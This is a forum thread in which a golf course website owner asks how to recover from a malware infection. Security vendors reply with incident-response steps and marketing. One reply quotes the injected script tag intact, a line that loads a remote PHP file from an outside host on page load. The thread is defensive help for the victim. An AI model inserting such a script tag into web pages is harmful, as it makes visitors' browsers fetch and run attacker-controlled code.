Not sure where to start
by tiffmill
5 months ago

My website has been infected with Malware: www.bayview-golfcourse.com. It has infected all of the business computers with a Trojan Horse. I do not currently have a clean version of the webfiles, since all the webfiles are on infected computers.

Where do I start first?
by anirban
5 months ago

Hello :-),

Jaal Scan ID # 30983613362-610 output

Malicious code detected on line 9 of www.bayview-golfcourse.com

starts with

<!—ript src=hxxp://vir tualportf olio.ca/ima ges/gifimg>

Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.

If you have any specific issues feel free to ask for help.

Also, I am collecting info from people affected by attacks like this, if it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).

We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Twitter: @stopthehacker
Facebook: stopthehacker
Jaal: Protecting the Internet, one website at a time™
by tiffmill
5 months ago

This may sound silly, but do I run the risk of infecting a virus free computer by simply deleting this script from my web files?

However I am considering wiping the hosting directory, however how do I check for malware on the server and in the backend database?

Thank you for your help.

Cheers,

Tiffany
by ddatsucuri
5 months ago

By simply deleting the file you are not going to infect your box. However, do not browse your web site with javascript enabled, specially if you are not have the latest IE/Windows updates.

To check the server for malware, you have to download your files and do a full scan of them.

If you need someone to do that for you, send us an email.

—dd dd@sucuri.net
http://sucuri.net – Web-based Integrity Monitoring
Let us remove the malware for you!
1 year monitoring plans + malware removal
by ddatsucuri
5 months ago

Hey,

You have to start from the beginning take the proper incident response actions,

1-Clean first your desktops. Install a good Anti virus, anti-spiware and get them clean up.
2-Shut down your site, removing all the files (if possible)
3-Once your desktops are clean, download the FTP files from the server, scan them for malware and remove the issues found.
4- Re-upload the files and submit your site to be de-blacklisted by google.

Just FUY, the malware is the following on your main page:

< script src=http://virtualportfolio.ca/images/gifimg.php >

If you need someone to find and remove all the malware for you and clean up your site and monitor it from now on (to avoid issues like that again), send us an email. We have some good online plans that may fit you.

—dd dd@sucuri.net
http://sucuri.net – Web-based Integrity Monitoring
Let us remove the malware for you!
1 year monitoring plans + malware removal
About Contact Us Terms & Conditions Privacy Policy Copyright